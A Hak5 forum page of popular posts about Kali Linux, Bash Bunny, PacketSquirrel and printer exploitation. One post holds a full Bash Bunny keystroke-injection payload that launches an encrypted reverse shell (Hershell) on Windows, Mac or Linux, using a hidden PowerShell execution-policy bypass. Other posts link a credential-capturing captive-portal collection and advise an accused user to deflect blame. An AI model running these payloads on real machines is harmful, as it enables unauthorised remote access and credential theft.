Hak5 Forums


Popular Content

Showing content with the highest reputation since 03/23/2018 in all areas

  1. 2 points
    I used to run it as my daily driver. Just add a normal non-root user, and change the background. Unless someone sees it booting, they're not going to know it's Kali. I changed my boot screen and login screens as well anyway. That's why they went with the Debian base, to be used as a main OS. I'm running stock Debian now though, less shit starting up that I didn't really need.
  2. 1 point
    Please PM me if there are any issues/improvements. Thanks!

    #!/bin/bash
    # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
    # Author: m3t4lk3y
    # Version: 0.5
    # Target: Windows, Mac OSX, Linux
    # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
    # Instructions:
    # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
    # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
    # 2. Uncomment desired target OS payload lines and ensure others are commented out
    # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
    # 4. Execute attack via Bash Bunny

    # SETUP
    DRIVER_LABEL='WINDOWS'          # Drive label for your Bash Bunny
    LED R
    GET SWITCH_POSITION             # Gets switch position (e.g. switch2)
    ATTACKMODE STORAGE HID SERIAL   # Keyboard HID Attack + Storage + Serial

    # Modified RUN helper
    function RUN() {
        local os=$1
        shift
        [[ -z "$os" || -z "$*" ]] && exit 1
        case "$os" in
            WIN)
                QUACK GUI m
                QUACK DELAY 500
                QUACK GUI r
                QUACK DELAY 500
                QUACK STRING cmd.exe
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "$@"
                QUACK DELAY 100
                QUACK ENTER
                ;;
            OSX)
                QUACK GUI SPACE
                QUACK DELAY 100
                QUACK STRING terminal
                QUACK DELAY 100
                QUACK ENTER
                QUACK GUI t
                QUACK DELAY 100
                QUACK STRING /bin/bash
                QUACK DELAY 100
                QUACK ENTER
                QUACK STRING "$@"
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 100
                QUACK STRING "exit"
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 100
                QUACK STRING "exit"
                QUACK DELAY 100
                QUACK ENTER
                ;;
            UNITY)
                QUACK ALT F2
                QUACK DELAY 1000
                QUACK STRING xterm
                QUACK DELAY 1000
                QUACK ENTER
                QUACK DELAY 1000
                QUACK STRING /bin/bash
                QUACK DELAY 1000
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING cd /media/'$USER'
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "$@"
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "exit"
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "exit"
                QUACK DELAY 500
                QUACK ENTER
                ;;
            *)
                exit 1
                ;;
        esac
    }
    export -f RUN

    # START Attack
    LED Y

    # [+] Mac - Uncomment the following lines to use:
    # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done   # Wait for bb to mount
    # LED Y FAST
    # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"

    # [+] Linux - Uncomment the following lines to use:
    until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5   # Wait for bb to mount
    LED Y FAST
    RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"

    # [+] Windows - Uncomment the following lines to use:
    # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5   # Wait for bb to mount
    # LED Y FAST
    # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"

    # END
    sleep 5
    LED G
    # shutdown 0   # LIGHTS OUT = Shutdown and dismount (if desired)
  3. 1 point
    Hi. I'm searching for a way to sniff any phone's SMS messaging. But I just found it is possible with some phones (Samsung S5, S6, Note). Can I sniff any phone with an RTL-SDR antenna & Wireshark?
  4. 1 point
    I had Avira installed on my PC and it blocked the internet sharing.
  5. 1 point
    https://github.com/j0te/bashbunny-payloads/tree/master/payloads/library/prank/FakeUpdate - here you are.
  6. 1 point
    I didn't expect you'd need it spelled out so simply, but ok. You're sitting there, using a distribution of Linux that is known for penetration testing. People see that and might go "Oh, what is he doing? He shouldn't be there. Is he hacking into this establishment?" Overall, as I said in the other topic, learn how your own computer and network work first before going around elsewhere.
  7. 1 point
    As I tend to say, learn how your computer works, then how a network works, then go from there. There is also a free Kali Linux book available at https://www.kali.org/download-kali-linux-revealed-book/ But you should set yourself goals. Decide what you want to learn, and then go about learning it. There is no one trick that does it. No simple path. This is a journey of discovery and learning; it's long and arduous, but great fun too.
  8. 1 point
    My ebook on the Amazon Kindle store is good for beginners. Good luck. Kali Linux Handyman: The ins and outs of Kali Linux. Happy Hacking.
  9. 1 point
    Should be good, that's all I use.
  10. 1 point
    Download Metasploitable. Install it on VirtualBox. Launch some exploits at this virtual machine to see what a success looks like.
  11. 1 point
    Evil Portals: a collection of portals that can be loaded into the Evil Portal module and can be used to capture credentials. Usage and more: https://kbeflo.github.io/evilportals I'd be happy to hear about issues and suggestions. Feel free to ask anything, contribute new templates, and improve the project.
  12. 1 point
    Also, if it doesn't start right away, you can blow (on) it:
  13. 1 point
    Thanks team, I have been trying to get in more time to practice. You all gave very good answers to my question. This is why I chose Hak5 over the uhhhh competitors' non-existent customer support. A Minipwner OG also reached out to me. So away I go: practice, practice, practice. Thanks again. Peace.
  14. 1 point
    Message me in private (on the forum) and I will give you some links to read, watch, etc.
  15. 1 point
    I'm also wondering the same thing, I hope someone can chime in and clear it up for us both. Isn't there an Auto-Ethernet command now in firmware 1.5?
    - Added new AUTO_ETHERNET attackmode
    - This attackmode will first attempt to bring up ECM_ETHERNET. If after the default timeout of 20 seconds no connection is established, RNDIS_ETHERNET will be attempted.
    - In addition to AUTO_ETHERNET, ETHERNET_TIMEOUT_XX has been added. This sets the timeout to XX.
  16. 1 point
    I've messed with PRET in the past. It is all Python. I would say if the dependencies are met (which I believe are all in Python core) then it should work if PS has the same dependencies in its core. You could make it an SSH console, but since it is Python you could look through the main module to see how it uses its sub-modules and incorporate that into your own interface. Hey @Dave-ee Jones, why don't you see how this can be incorporated as a module into that WRT web interface you made? It would be great as a starter module to get a feel for how users can create their own modules for your system, if you are going that way. :-)
  17. 1 point
    Since getting a PacketSquirrel and learning that it would be great to drop behind, amongst other things, printers, it got me thinking. The PacketSquirrel already has some solid tools installed by default, but I figured PRET (Printer Exploitation Toolkit) would be a nice addition.
    Info on PRET: https://github.com/RUB-NDS/PRET
    Recent Blackhat presentation: https://www.blackhat.com/docs/us-17/thursday/us-17-Mueller-Exploiting-Network-Printers.pdf
    Other printer attack info: http://hacking-printers.net/wiki/index.php/Main_Page
    Known vulnerable printer databases here: https://github.com/RUB-NDS/PRET/tree/master/db
    Mine wasn't in the db but worked with PCL, so I'm sure others will work also. After some challenges squeezing it onto the PacketSquirrel without going full extroot, I think I figured it out on the default squirrel build. I tried adding /mnt as an opkg destination and using links and then pip etc., but in the end a manual install of the Python modules seems to have the lowest footprint. After install it still leaves the PacketSquirrel with 55% of unused rootfs. I'm not 100% sure if this can be "payloaded", but at least for remote SSH access it's a nice tool to have. My problem now is the printer I borrowed uses PCL, and that in itself is quite restrictive in what can be done with PRET, so I'm kinda out of my testing limit and need other targets to test against, so I'm sharing it here for others to try. The install method I used in the end was to plug my USB drive into my laptop and git clone each of the following to the drive:
    https://github.com/RUB-NDS/PRET
    https://github.com/etingof/pysnmp
    https://github.com/etingof/pysmi
    https://github.com/etingof/pyasn1
    https://github.com/tartley/colorama
    Once cloned, unplug safely and replug back into your squirrel. Then, EXCLUDING PRET, go into each dir and use Python to install the modules ("python setup.py install"). Afterwards you should then be able to run PRET and use its tools from the squirrel directly.
  18. 1 point
    Guys, should I update? The number of users saying that something is not working is concerning... What is the current status? Thanks!
  19. 1 point
    Put SSID filtering and client filtering both in deny mode (without putting anything inside).
  20. 1 point
    That's only needed for the keys stored in the /root/.ssh folder though. I was able to take a Squirrel out of the box, use ssh-copy-id to copy my keys, and SSH in without changing any permissions. Currently you can use AutoSSH, but we are replacing that with SSHTunnel in firmware 1.1.
  21. 1 point
    I don't have the original one, just my modified version from PyDuckGen: Click
  22. 1 point
    You could help in providing mind bottling theories to solving this question... how do you get shells... The honey pot was fun, but here were the next steps I took in exploring this botnet that is attacking my Super-L33t-wifi-router. There have been questions around here about setting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public IP... I have answered in this video. If anyone wants a demonstration of the steps I took in setting up the honey pot and the iptables rules used to redirect and monitor traffic, I could make a video.
  23. 1 point
    Could mod it to have 11 radios. Would be kind of costly though... Might just have to do it for the fun of it!
  24. 1 point
    Here are a few more pics. Currently working on a more compact enclosure, roughly a third smaller. Some improvements with the smaller enclosure will be custom USB cables, possibly removal of the cooling fan (testing if it is actually needed), and as mentioned before a built in battery pack. The current setup was mainly done for testing but seems to be very functional. The only piece not seen in the pictures is the GPS unit which is mounted to the lid of the enclosure. Any suggestions for improvements or general thoughts on the build would be appreciated!
  25. 1 point
    If done correctly, I guess a hack can't be traced technically. So try to disprove the evidence. 1) Maybe you can prove you weren't near your laptop at the time of one of these Skype incidents. 2) If there are Skype recordings, maybe they can work in your favor. 3) If your password was weak at the time (several old passwords may still be in the system), you can claim someone else hacked your account. 4) Maybe you have obvious enemies, and if they had motive/means/opportunity, you can claim they did this... 5) Etc. Also it may be a good thing to lawyer up, depending on how serious the situation is.